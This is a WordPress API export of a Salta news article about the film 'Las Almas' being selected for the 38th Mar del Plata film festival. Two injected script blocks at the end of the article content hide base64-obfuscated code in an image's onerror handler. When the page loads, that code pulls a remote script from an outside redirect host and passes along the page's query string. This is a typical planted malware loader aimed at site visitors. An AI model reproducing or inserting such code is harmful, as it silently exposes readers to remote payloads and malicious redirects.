{"id":3241,"date":"2023-11-02T09:19:09","date_gmt":"2023-11-02T12:19:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3241"},"modified":"2025-08-14T00:06:15","modified_gmt":"2025-08-14T03:06:15","slug":"las-almas-participara-de-la-competencia-internacional-del-38o-festival-de-cine-de-mar-del-plata","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3241","title":{"rendered":"\u201cLas Almas\u201d participar\u00e1 de la competencia internacional del 38\u00ba Festival de Cine de Mar del Plata"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#6d062f\"><em>La pel\u00edcula es la \u00f3pera prima de la directora salte\u00f1a y fue uno de los proyectos ganadores del Plan de Fomento IDEA.<\/em><\/h3>\n\n\n\n<p>La selecci\u00f3n de \u201cLas Almas\u201d, de Laura Basombr\u00edo, estar\u00e1 en la competencia m\u00e1s importante del Festival Internacional de Cine de Mar del Plata. Es&nbsp;un hecho de gran relevancia para el audiovisual y la cultura de Salta. Este festival, considerado el evento cinematogr\u00e1fico m\u00e1s destacado del pa\u00eds y la regi\u00f3n, \u00fanico de clase A en Latinoam\u00e9rica, tendr\u00e1 lugar desde hoy&nbsp;jueves 2 al domingo 12 de noviembre con una amplia selecci\u00f3n de pel\u00edculas nacionales e internacionales, abarcando competencias, homenajes, panoramas, paralelas y funciones especiales.<\/p>\n\n\n\n<p>\u00abLas Almas\u00bb ha sido distinguida como uno de los proyectos ganadores del Plan de Fomento IDEA en dos ocasiones. En 2021, obtuvo el apoyo en la categor\u00eda de \u00abApoyo a Rodaje\u00bb, con una financiaci\u00f3n de $150.000, y en 2023, se destac\u00f3 en la categor\u00eda de \u00abFinalizaci\u00f3n de Obras Audiovisuales\u00bb, recibiendo un financiamiento de $2.500.000.<\/p>\n\n\n\n<p>Esta selecci\u00f3n no solo reconoce el talento y la dedicaci\u00f3n de Laura Basombr\u00edo y su equipo, sino que tambi\u00e9n destaca la importancia del respaldo brindado por el Gobierno de Salta a trav\u00e9s del Plan de Fomento IDEA al desarrollo de la actividad cinematogr\u00e1fica y audiovisual.<\/p>\n\n\n\n<p><strong>\u201cLas almas\u201d de Laura Basombr\u00edo<\/strong><\/p>\n\n\n\n<p>Trailer: https:\/\/vimeo.com\/872589874<\/p>\n\n\n\n<p>Habitando la frontera que separa (o re\u00fane) lo m\u00edstico y lo terrenal, Las almas propone un sue\u00f1o. Sobre los paisajes entre marcianos y lunares del noroeste argentino, la voz de una mujer cuenta su historia. Un relato en el que la memoria se funde con lo on\u00edrico y donde el c\u00e1ndido existencialismo de algunas preguntas (\u201c\u00bfC\u00f3mo ser\u00e1 cuando est\u00e1s muerto?\u201d) surge espont\u00e1neo, libre de toda neurosis. El recuerdo de los que ya no est\u00e1n, la contemplaci\u00f3n de los otros, la vida comunitaria, el trabajo a diario. A partir de una fotograf\u00eda alucinada, la pel\u00edcula ilustra como pocas ese territorio ancestral, mientras un trabajo sonoro de alta precisi\u00f3n construye sobre lo cotidiano un universo \u00fanico. Las almas es un desaf\u00edo sensible, una experiencia cercana al \u00e9xtasis. Una traves\u00eda a los confines del pa\u00eds, del mundo, del cine.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/las-almas-participara-de-la-competencia-internacional-del-38-festival-de-cine-de-mar-del-plata-92614\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La pel\u00edcula es la \u00f3pera prima de la directora salte\u00f1a y fue uno de los proyectos ganadores del Plan de Fomento IDEA. La selecci\u00f3n de \u201cLas Almas\u201d, de Laura Basombr\u00edo, estar\u00e1 en la competencia m\u00e1s importante del Festival Internacional de Cine de Mar del Plata. Es&nbsp;un hecho de gran relevancia para el audiovisual y la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3242,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-3241","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3241"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3241"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3241\/revisions"}],"predecessor-version":[{"id":6932,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3241\/revisions\/6932"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3242"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3241"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}